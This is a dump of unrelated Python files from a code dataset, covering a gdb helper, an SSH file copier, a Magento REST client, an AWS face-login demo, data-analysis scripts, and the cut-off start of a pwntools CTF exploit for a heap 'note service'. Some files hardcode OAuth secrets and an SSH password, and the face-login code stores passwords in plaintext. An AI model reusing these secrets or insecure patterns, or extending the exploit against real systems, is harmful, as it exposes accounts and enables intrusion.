unicode(value)\n except:\n ret = str(value)\n\n for pp in gdb.pretty_printers:\n pp.enabled = pp.saved\n\n return ret\n\n\n#------------------------------------------------------------------------------\n# Caching lookups.\n\n@memoized\ndef T(name):\n return gdb.lookup_type(name)\n\n@memoized\ndef V(name):\n return gdb.lookup_symbol(name)[0].value()\n\n@memoized\ndef K(name):\n return gdb.lookup_global_symbol(name).value()\n\n\n#------------------------------------------------------------------------------\n# Type manipulations.\n\ndef template_type(t):\n \"\"\"Get the unparametrized name of a template type.\"\"\"\n return str(t).split('<')[0]\n\n\ndef is_ref(t):\n \"\"\"Return whether a type `t' is a C++ pointer or reference type.\"\"\"\n return (t.code == gdb.TYPE_CODE_PTR or\n t.code == gdb.TYPE_CODE_REF)\n\n\ndef deref(val):\n \"\"\"Fully dereference a value, stripping away *, &, and all known smart\n pointer wrappers (as well as const/volatile qualifiers).\"\"\"\n\n while True:\n t = val.type.unqualified().strip_typedefs()\n\n if is_ref(t):\n val = val.referenced_value()\n continue\n\n name = template_type(t)\n\n if name == 
\"HPHP::LowPtr\" or name == \"HPHP::LowPtrImpl\":\n inner = t.template_argument(0)\n val = val['m_raw'].cast(inner.pointer()).dereference()\n continue\n\n if name == \"HPHP::SmartPtr\" or name == \"HPHP::AtomicSmartPtr\":\n val = val['m_px'].dereference()\n continue\n\n return val\n","sub_path":"hphp/tools/gdb/gdbutils.py","file_name":"gdbutils.py","file_ext":"py","file_size_in_byte":2954,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"421457905","text":"import sys\nimport os\nimport socket\nimport subprocess\nimport argparse\nfrom pexpect import popen_spawn, EOF\nfrom datetime import datetime\nfrom watchdog.observers import Observer\nfrom watchdog.events import PatternMatchingEventHandler\nfrom ssh2.session import Session\nfrom time import sleep\n\nclass AutoCopier:\n\n def __init__(self):\n self.source = \"\"\n self.dest = \"\"\n self.basename = \"\"\n self._parse_commands()\n\n def _parse_commands(self):\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-fe\", \"--force-execution\", type=str, help=\"After a file change\" +\n \"is detected, \", action=\"store\")\n parser.add_argument(\"watchdir\", help=\"Directory to watch for changes\")\n parser.add_argument(\"targetdir\", help=\"Directory where changed files are copied to\")\n # parser.add_argument(\"host\", help=\"Remote device to connect to\")\n if len(sys.argv) != 3:\n print(\"Invalid input\\n\")\n quit()\n\n self.source = sys.argv[1]\n self.dest = sys.argv[2]\n\n if not os.path.exists(self.source):\n print(\"Directory not found\\n\")\n quit()\n\n if self.source == \".\":\n self.source = os.getcwd()\n\n if self.source[-1] == \"\\\\\" or self.source[-1] == \"/\":\n self.source = self.source[:len(self.source) - 1]\n\n if not self.dest.endswith(\"/\") and not self.dest.endswith(\":\"):\n self.dest += \"/\"\n\n self.basename = os.path.split(self.source)[1]\n\n print(\"Source path: %s, Dest path: %s, Directory basename: %s\" %\n (self.source, self.dest, self.basename))\n\n def run(self):\n event_handler = Handler(self.basename, self.dest, patterns=[\"*.py\"],\n ignore_patterns=[\"*.py___jb_old___\", \"*.py___jb_temp___\"])\n\n observer = Observer()\n observer.schedule(event_handler, self.source)\n observer.start()\n\n try:\n while True:\n sleep(1)\n except KeyboardInterrupt:\n observer.stop()\n\n observer.join()\n\n\n\nclass Handler(PatternMatchingEventHandler):\n \"\"\"Event handler for observer.\"\"\"\n\n def __init__(self, basename, dest, patterns=None, ignore_patterns=None):\n self.last_time = 0\n self.most_recent_time = 0\n self.last_path = \"\"\n self.most_recent_path = \"\"\n self.basename = basename\n self.dest = dest\n self.sm = SessionManager()\n\n PatternMatchingEventHandler.__init__(self, patterns, ignore_patterns)\n\n def on_created(self, event):\n print(\"Detected file creation: Path: %s\\n\" % event.src_path)\n\n def on_modified(self, event):\n self.most_recent_time = os.stat(event.src_path).st_mtime\n self.most_recent_path = event.src_path\n\n print(\"Last modification: %d, Most recent modification: %d\" %\n (self.last_time, self.most_recent_time))\n\n # Account for possible duplicate modification events but allow detection\n # of more than one file changing in watch cycle\n if self.last_path != self.most_recent_path or \\\n (self.last_path == self.most_recent_path and\n self.most_recent_time - self.last_time > .5):\n\n rel_path = self._get_rel_path(event.src_path)\n\n print(\"Detected file modification:\\n\\tPath: %s\\n\\tRelative Path: %s\"\n % 
(event.src_path, rel_path))\n\n self.copy_file(event.src_path, self.dest, rel_path)\n\n self.last_time = self.most_recent_time\n self.last_path = self.most_recent_path\n\n\n\n def on_deleted(self, event):\n print(\"Detected file deletion:\\n\\tPath: %s\\n\" % event.src_path)\n\n def on_moved(self, event):\n\n if len(event.src_path) > len(event.dest_path):\n diff = event.src_path.replace(event.dest_path, \"\")\n else:\n diff = event.dest_path.replace(event.src_path, \"\")\n\n # print(\"Diff between paths: %s\\n\" % diff)\n\n if diff != \"___jb_tmp___\" and diff != \"___jb_old___\":\n\n print(\"Detected moved/renamed file:\\n\\tOld path: %s\\n\\tNew path: %s\\n\" %\n (event.src_path, event.dest_path))\n\n def _get_rel_path(self, event_source_path):\n rel_path = event_source_path.partition(self.basename)[2]\n rel_path = rel_path.replace(\"\\\\\\\\\", \"/\")\n rel_path = rel_path.replace(\"\\\\\", \"/\")\n\n if rel_path.startswith(\"/\"): rel_path = rel_path[1:]\n\n return rel_path\n\n def copy_file(self, source_path, dest_path, rel_path):\n\n cmd = \"scp %s %s%s\\n\" % (source_path, dest_path, rel_path)\n print(cmd)\n\n # ------------------------------------------------\n # ------------------------- With PSCP ------------\n # ------------------------------------------------\n\n # pscp_path = \"C:\\Program Files\\PuTTY\\pscp.exe\"\n # dest_full_path = dest_path + rel_path\n # subprocess.call([pscp_path, \"-sftp\", \"-pw\", \"maker\", source_path,\n # dest_full_path])\n\n # ------------------------------------------------\n # --------------------- With SSH2 ----------------\n # ------------------------------------------------\n\n self.sm.scp(source_path, dest_path + rel_path)\n\n\n\nclass SessionManager:\n \"\"\"Opens an SSH session\"\"\"\n\n def __init__(self):\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n sock.connect((\"ev3dev\", 22))\n\n self.session = Session()\n self.session.handshake(sock)\n self.session.userauth_password(\"robot\", \"maker\")\n self.session.keepalive_config(True, 60)\n\n def run_remote_cmd(self, cmd):\n chan = self.session.open_session()\n chan.execute(cmd)\n\n # Read output\n output = \"\"\n size, data = chan.read()\n while size > 0:\n output += data.decode('utf-8')\n print(data.decode('utf-8'))\n size, data = chan.read()\n\n sig, err, lang_tag = chan.get_exit_signal()\n print(err.decode('utf-8'))\n\n chan.close()\n\n return sig, output\n\n def scp(self, src_path, dest_path):\n\n fileinfo = os.stat(src_path)\n\n chan = self.session.scp_send64(dest_path, fileinfo.st_mode & 0o777, fileinfo.st_size,\n fileinfo.st_mtime, fileinfo.st_atime)\n\n # Output Stats\n now = datetime.now()\n with open(src_path, 'rb') as local_fh:\n for data in local_fh:\n chan.write(data)\n taken = datetime.now() - now\n rate = (fileinfo.st_size / 1024000.0) / taken.total_seconds()\n print(\"Finished writing %s to remote in %s | %.4f. MB/s\" %\n (dest_path, taken, rate))\n\n chan.close()\n\n def disconnect(self):\n self.session.disconnect()\n\n\nif __name__ == \"__main__\":\n\n auto_copier = AutoCopier()\n auto_copier.run()\n\n\n\n","sub_path":"AutoCopy.py","file_name":"AutoCopy.py","file_ext":"py","file_size_in_byte":6889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"14049989","text":"# -*- coding: utf-8 -*-\n\nfrom django.conf.urls import include, url\n\nfrom . 
import views\n\napp_name = 'reservas'\nurlpatterns = [\n    \n    url(r'^$', views.index, name = 'index'),\n    url(r'^login/$', views.the_login, name = 'the_login'),\n    url(r'^logout/$', views.the_logout, name = 'the_logout'),\n    url(r'^reservar/$', views.reservar, name = 'reservar'),\n    url(r'^lista/$', views.lista, name = 'lista'),\n    url(r'^lista/json/$', views.lista_json, name = 'lista_json'),\n    url(r'^reserva/ver/(?P<id>.*)$', views.ver_reserva, name = 'ver_reserva'),\n    url(r'^reserva/imprimir/(?P<id>.*)$', views.imprimir_reserva, name = 'imprimir_reserva'),\n    url(r'^reserva/print/(?P<id>[\\w\\-]+)/$', views.imprimir_reserva_compra, name='imprimir_reserva_compra'),\n    url(r'^cliente/$', views.cliente, name = 'cliente'),\n    \n    url(r'^informe/cliente/$', views.informe_cliente, name = 'informe_cliente'),\n    url(r'^informe/cliente/traer/$', views.informe_cliente_traer, name = 'informe_cliente_traer'),\n    url(r'^informe/servicios/$', views.informe_servicios, name = 'informe_servicios'),\n    url(r'^informe/servicios/traer/$', views.informe_servicios_traer, name = 'informe_servicios_traer'),\n    url(r'^informe/servicios/seleccionar/$', views.informe_servicios_seleccionar, name = 'informe_servicios_seleccionar'),\n    url(r'^informe/servicios/seleccionados/$', views.informe_servicios_seleccionados, name = 'informe_servicios_seleccionados'),\n    url(r'^informe/adicional/$', views.informe_adicional, name = 'informe_adicional'),\n    url(r'^informe/adicional/traer/$', views.informe_adicional_traer, name = 'informe_adicional_traer'),\n\n]\n","sub_path":"reservas/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1637,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
+{"seq_id":"166511628","text":"#script for analysing shortest paths from all nodes in road network of Canton Zurich to Zurich main central station\nimport pandas as pd\nimport networkx as nx\n\n#general workspace settings\nmyworkspace=\"C:/DATA/develops/zh\"\nroadstable=myworkspace+\"/zhroads.csv\"\n\n#create a csv file for nodes and edges\nnodesfile=open(myworkspace+\"/nodes.csv\",\"w\")\nedgesfile=open(myworkspace+\"/edges.csv\",\"w\")\nnodesfile.write(\"nodeid\"+\";\"+\"x\"+\";\"+\"y\"+\"\\n\")\nedgesfile.write(\"edgeid\"+\";\"+\"nodeid1\"+\";\"+\"nodeid2\"+\";\"+\"length\"+\"\\n\")\nnodesdistancesfile=open(myworkspace+\"/nodesdistances.csv\",\"w\")\nnodesdistancesfile.write(\"nodeid\"+\";\"+\"x\"+\";\"+\"y\"+\";\"+\"distancetoZHsbb\"+\"\\n\")\n\n#read the roads table\nroadsdf=pd.read_csv(roadstable, delimiter=\";\")\n\n#loop through roads dataframe and create a list of nodes and a list of edges\nnodescoordinateslist=[]\nnodesidlist=[]\nedgeslist=[]\nnodescounter=0\n\n#create graph\nG = nx.Graph()\n\nfor index, row in roadsdf.iterrows():\n    if row.ID_Road not in edgeslist:\n        edgeslist.append(row.ID_Road)\n        xstart = row.BeginX\n        ystart = row.BeginY\n        xend = row.EndX\n        yend = row.EndY\n        length = row.SHAPE_Leng\n        nodeidstart=0\n        nodeidend=0\n        #check if node coordinates are not counted twice\n        if [xstart, ystart] not in nodescoordinateslist:\n            nodescoordinateslist.append([xstart, ystart])\n            nodescounter+=1\n            nodesidlist.append(nodescounter)\n            nodeidstart=nodescounter\n            nodesfile.write(str(nodeidstart) + \";\" + str(xstart) + \";\" + str(ystart) + \"\\n\")\n            G.add_node(nodeidstart, pos=(xstart, ystart))\n        else:\n            nodeidstart=nodesidlist[nodescoordinateslist.index([xstart, ystart])]\n            G.add_node(nodeidstart, pos=(xstart, ystart))\n        if [xend, yend] not in nodescoordinateslist:\n            nodescoordinateslist.append([xend, yend])\n
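            #first time this end coordinate appears: register it and hand out the next node id\n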
            nodescounter += 1\n            nodesidlist.append(nodescounter)\n            nodeidend = nodescounter\n            nodesfile.write(str(nodeidend) + \";\" + str(xend) + \";\" + str(yend) + \"\\n\")\n            G.add_node(nodeidend, pos=(xend, yend))\n        else:\n            nodeidend=nodesidlist[nodescoordinateslist.index([xend, yend])]\n            G.add_node(nodeidend, pos=(xend, yend))\n        #add the road segment to the graph\n        edgesfile.write(str(row.ID_Road)+\";\"+str(nodeidstart)+\";\"+str(nodeidend)+\";\"+str(length)+\"\\n\")\n        edgeslist.append([row.ID_Road,nodeidstart,nodeidend,length])\n        G.add_edge(nodeidstart, nodeidend, weight=length)\nnodesfile.close()\nedgesfile.close()\nprint(\"network graph created ...\")\n\n#G.clear()\n\n#target is main railway station in Zurich = node_id 76266\ntargetnode=72356\n\n#calculate shortest path for each node\ni=0\nwhile i int:\n    \"\"\"\n    Return the number of requests per day.\n    \"\"\"\n    url = 'https://api.vk.com/method/newsfeed.search'\n    params = {\n        'access_token': os.getenv('TOKEN'),\n        'v': '5.95',\n        'q': query,\n        'start_time': start_time,\n        'end_time': end_time\n    }\n    response = requests.get(url, params=params)\n    return response.json()['response']['total_count']\n\n\ndef get_statistic_per_period(timestamps_list, query) -> list:\n    \"\"\"\n    Return a list with the number of requests for each day.\n    \"\"\"\n    return [(date, get_statistic_per_day(day_timestamp_start, day_timestamp_end, query)) for\n            date, day_timestamp_start, day_timestamp_end in timestamps_list]\n\n\ndef get_day_timestamps(year, month, day) -> tuple:\n    \"\"\"\n    Return a tuple with timestamps of start of day and end of day.\n    \"\"\"\n    time_delta = datetime.timedelta(days=1)\n    day_start = datetime.datetime(year, month, day)\n    day_end = day_start + time_delta\n    return day_start.timestamp(), day_end.timestamp()\n\n\ndef get_period(n=7) -> list:\n    \"\"\"\n    Return a list of date objects for the last N days.\n    \"\"\"\n    today = datetime.date.today()\n    days = []\n\n    for offset in range(1, n + 1): # to get statistics for the last 7 days, starting from yesterday\n        time_delta = datetime.timedelta(days=offset)\n        day = today - time_delta\n        days.append(day)\n\n    return days\n\n\ndef get_period_timestamps(period) -> list:\n    \"\"\"\n    Return a list with timestamps of each day in period.\n    \"\"\"\n    return [(day, *get_day_timestamps(day.year, day.month, day.day)) for day in period]\n\n\ndef create_graph(statistic: list, name, auto_open=True) -> str:\n    \"\"\"\n    Generate a graph and return the link to this schedule.\n    \"\"\"\n    trace1 = [go.Bar(\n        x=[date.day for date, count in statistic],\n        y=[count for date, count in statistic],\n        name=name\n    )]\n    link = plotly.offline.plot(trace1, filename=f'{name}.html', auto_open=auto_open)\n    return link\n\n\nif __name__ == '__main__':\n    parser = argparse.ArgumentParser(description='Create a schedule with the frequency of the request.')\n    parser.add_argument('query', help='Query for search.')\n    parser.add_argument('period', help='Period for search.', type=int)\n    args = parser.parse_args()\n\n    period = get_period(args.period)\n    period_timestamps = get_period_timestamps(period)\n    statistic = get_statistic_per_period(period_timestamps, args.query)\n    create_graph(statistic, args.query)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2741,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
+{"seq_id":"179581681","text":"from requests_oauthlib import OAuth1 as OAuth\nimport requests\nimport sys\nimport simplejson\nfrom time import time\n\n# Reference:
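 Magento REST API documentation (URL below).\n#\n# Minimal usage sketch (added for illustration; 'products' and the filter values are\n# assumptions, not from this module's docs):\n#   read_all('products', filters=['status=1', 'price > 10'], maxitems=50)\n#\n# Reference: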
http://devdocs.magento.com/guides/m1x/api/rest-api-index.html\n# Reference GET Filters: http://devdocs.magento.com/guides/m1x/api/rest/get_filters.html\n\n# Parameters\nclient_key = u'd5b2c6073e14ea2844952b287c94d934'\nclient_secret = u'5269ac0f1d7b9f191332a00096f82d66'\nresource_owner_key = u'7187f89eb898a9b102980f2e60589ca7'\nresource_owner_secret = u'd278e5cf9ff3799cc5b27ea80867e211'\nbaseurl = 'http://www.papelex.com.br/api/rest/'\n\n\ndef my_requests(method_name, url, params=None, data=None):\n global client_key, client_secret, resource_owner_key, resource_owner_secret\n oauth = OAuth(client_key=client_key,\n client_secret=client_secret,\n resource_owner_key=resource_owner_key,\n resource_owner_secret=resource_owner_secret)\n method = getattr(requests, method_name)\n response = method(\n url=str.format('{0}{1}{2}',\n url if baseurl in url else baseurl,\n '' if baseurl[-1] == '/' else '/',\n '' if baseurl in url else url\n ),\n auth=oauth, \n headers = {\n 'Content-Type': 'application/json',\n 'Content_Type': 'application/json', \n 'Accept': 'application/json'\n },\n params=params,\n data=simplejson.dumps(data) if data else None\n )\n if response.status_code == 200:\n try:\n return simplejson.loads(response.text)\n except:\n return response.text\n else:\n return response.text\n\n\ndef parse_filter_identified(filter, simple_operator, operator, index):\n # returns the dict equivalent to: filter[1][attribute]=entity_id&filter[1][neq]=3\n return {'filter[%s][attribute]' % index: filter.split(simple_operator)[0], 'filter[%s][%s]' % (index, operator): filter.split(simple_operator)[1]}\n\n\ndef parse_filter(filter, index):\n possible_operators = {\n '=': 'eq',\n '!=': 'neq',\n '<>': 'neq',\n ' in ': 'in',\n ' not in ': 'nin',\n ' > ': 'gt',\n ' < ': 'lt',\n }\n for simple_operator in possible_operators:\n if simple_operator in filter:\n return parse_filter_identified(filter, simple_operator, possible_operators[simple_operator], index)\n return filter\n\n\ndef parse_filters(filters):\n params = dict()\n for index, filter in enumerate(filters):\n params.update(parse_filter(filter, index+1))\n return params\n\n\ndef read(endpoint, id, params={}, buffer_size=100, debug=False):\n if debug:\n start_time = time()\n items = my_requests('get', endpoint + ('' if endpoint[-1] == '/' else '/') + str(id), params)\n if debug:\n print(time() - start_time)\n return items\n\n\ndef read_all(endpoint, filters=[], params={}, buffer_size=100, maxitems=sys.maxint, debug=False):\n if debug:\n start_time = time()\n result = list()\n page = 1\n prev_items = None\n params.update(parse_filters(filters))\n while 1:\n new_params=dict(page=page, limit=buffer_size)\n params.update(new_params)\n items = my_requests('get', endpoint, params)\n if isinstance(items, dict) and isinstance(items[items.keys()[0]], dict):\n items = items.values()\n if not isinstance(items, list):\n items = list(items)\n if prev_items == items:\n break\n result.extend(items)\n if len(result) >= maxitems:\n break\n page += 1\n prev_items = items\n if len(result) > maxitems:\n result = result[:maxitems]\n if debug:\n print(time() - start_time)\n return result\n\n\ndef update(endpoint, id, filters=[], params={}, data={}, debug=False):\n if debug:\n start_time = time()\n items = my_requests('put', endpoint + ('' if endpoint[-1] == '/' else '/') + str(id), params, data=data)\n if debug:\n print(time() - start_time)\n return 
items\n","sub_path":"papelex_magento/rest.py","file_name":"rest.py","file_ext":"py","file_size_in_byte":3963,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
+{"seq_id":"355793920","text":"import boto3\nimport json\n\nakey = \"\"\nskey = \"\"\ncname = \"biometricspoc\"\nbucket = \"biometricspocs3\"\ntable = \"biometricsdynamo\"\n\nrekclient = boto3.client('rekognition', aws_access_key_id = akey, aws_secret_access_key = skey, region_name = 'us-east-1')\ndynamo = boto3.client('dynamodb', aws_access_key_id = akey, aws_secret_access_key = skey, region_name = 'us-east-1')\ns3 = boto3.client('s3', aws_access_key_id = akey, aws_secret_access_key = skey, region_name = 'us-east-1')\n\ndef createCollection(name):\n    res = rekclient.create_collection(CollectionId=name)\n    return res\n\n\ndef indexFaces(key):\n    response = rekclient.index_faces(Image={\"S3Object\":{\"Bucket\":bucket, \"Name\":key,}}, CollectionId=cname, ExternalImageId=key,)\n    return response['FaceRecords']\n\n\ndef createImageEntry(data):\n    res = dynamo.put_item(TableName=table, Item={'email':{'S':data['email']},'fname':{'S':data['fname']},'lname':{'S':data['lname']}, 'imagename':{'S':data['imagename']},'pwd':{'S':data['pwd']},})\n    return res\n\n\ndef searchFacesByImage(name):\n    response = rekclient.search_faces_by_image(Image={\"S3Object\":{\"Bucket\":bucket, \"Name\":name,}}, CollectionId=cname, FaceMatchThreshold=80)\n    return response\n\n\ndef login(name):\n    #upload image to bucket in UI and send name to this function\n    #check for match\n    response = searchFacesByImage(name)\n    if response['FaceMatches'] == []:\n        data = \"Unable to find user\"\n    else:\n        data = {}\n        confidence = int(response['FaceMatches'][0]['Face']['Confidence'])\n        #getting data from dynamodb\n        res = dynamo.get_item(TableName=\"biometricsdynamo\", Key={'imagename':{'S':response['FaceMatches'][0]['Face']['ExternalImageId']}})\n        data['email'] = res['Item']['email']['S']\n        data['fname'] = res['Item']['fname']['S']\n        data['lname'] = res['Item']['lname']['S']\n        data['pwd'] = res['Item']['pwd']['S']\n        data['image'] = response['FaceMatches'][0]['Face']['ExternalImageId']\n        json.dumps(data)\n        #deleting temp image\n        s3.delete_object(Bucket=bucket, Key = name)\n    return data\n\n\ndef signup(data):\n    try:\n        #create rekognition mapping here\n        res = indexFaces(data['imagename'])\n        print(res)\n        #create dynamodb entry here\n        res2 = createImageEntry(data)\n        print(res2)\n        return \"Thanks.
 You are all set\"\n    except Exception as e:\n        print(e)\n        return \"Oops....Please retry\"\n\n\ndef lambda_handler(event, context):\n    #collectionName = createCollection(cname)\n    #print(collectionName)\n    #rekclient.delete_collection(CollectionId=cname)\n\n    #sample signup data\n    '''data = {}\n    data['fname'] = \"Mangalick\"\n    data['lname'] = \"Mitra\"\n    data['email'] = \"mangalick@deloitte.com\"\n    data['pwd'] = \"manmitra123\"\n    data['imagename'] =\"mangalick.jpg\"'''\n    #res = signup(data)\n    #sample login data\n    name = \"user4.jpg\"\n    res = login(\"login/%s\"%name)\n    print(res)\n    return res\n\n\n\nlambda_handler(0,0)\n","sub_path":"backend/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3005,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
+{"seq_id":"345479245","text":"# -*- coding: utf-8 -*-\n# @Time    : 2018/10/2 8:11\n# @Author  : WJH\n# @Email   : 1226778264@qq.com\n# @File    : MoonCake_DataAnalysis.py\n# @Software: PyCharm\nimport os\n\nimport jieba\nimport pandas as pd\nfrom tqdm import tqdm\nimport matplotlib.pyplot as plt\nfrom wordcloud import WordCloud\n# configure fonts so matplotlib can render Chinese characters in plots\nplt.rcParams['font.sans-serif'] = ['SimHei']\nplt.rcParams['axes.unicode_minus'] = False\n\n\ndef data_cleaning(title):\n    \"\"\"\n    Data cleaning\n\n    :param title: scraped mooncake product titles, e.g. 苏式五仁月饼传统手工白皮酥饼馅饼500\n    :return: tokenized form, e.g. 苏式 五仁 传统 手工 白皮 酥饼 馅饼 500\n    \"\"\"\n\n    # Tokenize each title:\n    # split every title into its individual words\n    title_s = []\n    for line in tqdm(title):\n        title_cut = jieba.lcut(line)\n        title_s.append(title_cut)\n    # Remove stop words (the entries are data for the Chinese titles and stay as-is)\n    title_clean = []\n    stop_words = [\"月饼\", \"礼品\", \"口味\", \"礼盒\", \"包邮\", \"【\", \"】\",\n                  \"送礼\", \"大\", \"中秋节\", \"中秋月饼\", \"2\", \"饼\", \"蓉\",\n                  \"多\", \"个\", \"味\", \"斤\", \"送\", \" \", \"老\", \"北京\", \"云南\", \"网红老\"]\n    for line in title_s:\n        line_clean = []\n        for word in line:\n            if word not in stop_words:\n                line_clean.append(word)\n        title_clean.append(line_clean)\n\n    # Deduplicate words within each title; the result is one list per record\n    title_clean_dist = []\n    for line in title_clean:\n        line_dist = []\n        for word in line:\n            if word not in line_dist:\n                line_dist.append(word)\n        title_clean_dist.append(line_dist)\n\n    # Collect every deduplicated, stop-word-filtered keyword,\n    # flattened across all records\n    all_words_clean_dist = []\n    for line in title_clean_dist:\n        for word in line:\n            all_words_clean_dist.append(word)\n    return all_words_clean_dist, title_clean_dist\n\n\ndef count_sales_to_each_word(df_data_info, word_count, title_clean_dist):\n    \"\"\"\n    Aggregate the sales volume associated with each keyword\n\n    :param df_data_info: the full data set\n    :param word_count: keyword frequency data\n    :param title_clean_dist: the tokenized records\n    :return:\n    \"\"\"\n\n    w_s_sum = []\n\n    for w in tqdm(word_count.word):\n        s_list = []\n        for i, t in enumerate(title_clean_dist):\n            if w in t:\n                s_list.append(df_data_info.sales[i])\n\n        # sum the sales of every record containing w, e.g. the word “广州”\n        w_s_sum.append(sum(s_list))\n\n    df_w_s_sum = pd.DataFrame({'w_s_sum': w_s_sum})\n    df_word_sum = pd.concat([word_count, df_w_s_sum], axis=1,\n                            ignore_index=True)\n    df_word_sum.columns = ['word', 'count', 'w_s_sum']\n\n    df_word_sum.sort_values('w_s_sum', inplace=True, ascending=True)\n    df_w_s = df_word_sum.tail(30)\n    x = list(df_w_s['word'].values)\n    y = list(df_w_s['w_s_sum'].values)\n\n    draw_bar(x, y, 'Sales volume by mooncake keyword', 'keyword', (12, 6), False)\n    pass\n\n\ndef price_num_distribution(df_data_info):\n    \"\"\"\n    Count the mooncake listings that fall into each price bracket\n\n    :param df_data_info: mooncake data\n    :return:\n    \"\"\"\n\n    price_info = df_data_info[['price']]\n    bins = [0, 10, 50, 100, 150, 200, 300, 500, 1000, 5000, 8000]\n    level = ['0-10', '10-50', '50-100', '100-150', '150-200',\n             '200-300', '300-500', '500-1000', '1000-5000', '5000-8000']\n\n    price_tag = pd.cut(price_info['price'], bins=bins, labels=level).value_counts().sort_index()\n    print(price_tag)\n\n    attribute = list(price_tag.index)\n    values = list(price_tag.values)\n    draw_bar(attribute, values, 'Price bracket & listing count distribution', 'count', (9, 6), True)\n    pass\n\n\ndef sales_num_distribution(df_data_info):\n    \"\"\"\n    Count the listings that fall into each sales bracket\n\n    :param df_data_info: mooncake data\n    :return:\n    \"\"\"\n\n    sales_info = df_data_info[['sales']]\n    bins = [0, 500, 1000, 3000, 5000, 10000, 30000, 50000, 100000, 200000, 300000]\n    level = ['0-500', '500-1000', '1000-3000', '3000-5000', '5000-10000',\n             '10000-30000', '30000-50000', '50000-100000', '100000-200000', '200000-300000']\n\n    sales_tag = pd.cut(sales_info['sales'], bins=bins, labels=level).value_counts().sort_index()\n    print(sales_tag)\n\n    attribute = list(sales_tag.index)\n    values = list(sales_tag.values)\n    draw_bar(attribute, values, 'Sales bracket & listing count distribution', 'count', (11, 6), True)\n\n\ndef location_num_distribution(df_data_info):\n    se_location = df_data_info.location.value_counts().sort_values()  # sort by the counts\n\n    attribute = list(se_location.index)\n    values = list(se_location.values)\n    draw_bar(attribute, values, 'Origin & listing count distribution', 'count', (11, 6), True)\n    pass\n\n\ndef draw_word_cloud(content_dist, save_picture_name):\n    \"\"\"\n    Draw a word cloud\n\n    :param content_dist: the words and their frequencies\n    :param save_picture_name: file name for the saved word cloud\n    :return: None\n    \"\"\"\n\n    # word-cloud background image\n    background_image = plt.imread('1.png')\n    wc = WordCloud(width=1024, height=768, background_color='white',\n                   mask=background_image, font_path='simkai.ttf',\n                   max_font_size=400, random_state=50)\n\n    # build the word cloud from the words and their frequencies\n    wc = wc.fit_words({x[0]: x[1] for x in word_count.head(100).values})\n    plt.imshow(wc, interpolation='bilinear')\n    plt.axis('off')\n    # plt.show()\n    # save the image\n    d = os.path.dirname(__file__)\n    wc.to_file(os.path.join(d, '{}.png'.format(save_picture_name)))\n\n\ndef draw_bar(x_attribute, y_value, title, legend_name, figure_size, is_label=False):\n    \"\"\"\n    Draw a bar chart\n\n    :param x_attribute: x-axis categories\n    :param y_value: y-axis values\n    :param title: chart title\n    :param legend_name: legend label\n    :param is_label: whether to annotate each bar with its value\n    :return:\n    \"\"\"\n\n    fig = plt.figure(figsize=figure_size)\n    plt.bar(x_attribute, y_value, width=0.5, color=\"green\", label=legend_name)\n    plt.grid(axis='y')\n    x_index = [float(i) for i in range(len(x_attribute))]\n    plt.xticks(x_index, x_attribute, size='small', rotation=30)\n\n    # annotate the top of each bar\n    if is_label:\n        for a, b in zip(x_attribute, y_value):\n            plt.text(a, b + 0.001, '%.1f' % b, ha='center', va='bottom', fontsize=9)\n\n    plt.title(title)\n    plt.legend()\n    # plt.show()\n    current_path = os.path.join(os.getcwd(), title + '.jpg')\n    plt.savefig(current_path)\n\n\nif __name__ == '__main__':\n\n    # step 1: load the data\n    f = open('MoonCakeData.csv', encoding='utf-8')\n    df = pd.read_csv(f, sep=',', names=['title', 'price', 'sales', 'location'])\n\n    print(df.describe())\n\n    title = df.title.values.tolist()\n\n    # step 2: clean the data\n    all_words_clean_dist, title_clean_dist = data_cleaning(title)\n\n    # step 3: draw the word cloud\n\n    # aggregate the filtered, deduplicated words\n    df_all_words_clean_dist = pd.DataFrame({'all_words': all_words_clean_dist})\n    # count how often each word occurs\n    word_count = df_all_words_clean_dist.all_words.value_counts().reset_index()\n    word_count.columns = ['word', 'count']\n    draw_word_cloud(all_words_clean_dist, 'Moon Cake')\n\n    # step 4: aggregate the sales volume per keyword\n    count_sales_to_each_word(df, word_count, title_clean_dist)\n\n    # step 5: listing counts per price bracket\n    price_num_distribution(df)\n\n    # step 6: listing counts per sales bracket\n    sales_num_distribution(df)\n\n    # step 7: listing counts per production origin\n    
location_num_distribution(df)\n\n\n","sub_path":"AnalysisMoonCake/MoonCake_DataAnalysis.py","file_name":"MoonCake_DataAnalysis.py","file_ext":"py","file_size_in_byte":7606,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"523265593","text":"import turtle # python needs this to use all the turtle functions\nturtle.shape('turtle') # changes the shape to a turtle\nfinn = turtle.clone() # creates new turtle and saves it in finn\nfinn.shape('square') # changes shape of 2nd turtle to square\n\nfinn.goto(100,100) # moves square to (x=100,y=100)\nfinn.pendown()\n\n\nfinn.forward(100)\nfinn.left(90)\nfinn.forward(100)\nfinn.left(90)\nfinn.forward(100)\nfinn.left(90)\nfinn.forward(100)\nfinn.left(90)\n\ncharlie = turtle.clone()\ncharlie.shape('triangle')\n\ncharlie.goto(50,100)\ncharlie.goto(100,0)\ncharlie.goto(0,0)\n\nfinn.goto(300,300)\nfinn.stamp()\nfinn.goto(100,100)\n\ncharlie.goto(-300,-300)\ncharlie.stamp()\ncharlie.goto(0,0)\n","sub_path":"funturtle.py","file_name":"funturtle.py","file_ext":"py","file_size_in_byte":666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"46126896","text":"from pwn import *\n\np = process(\"./task_note_service2\")\n#p = remote(\"117.78.43.127\",32059)\ncontext.log_level = 'debug'\n\ndef add(index, size, content):\n p.recvuntil(\"your choice>> \")\n p.sendline(\"1\")\n p.recvuntil(\"index:\")\n p.sendline(str(index))\n 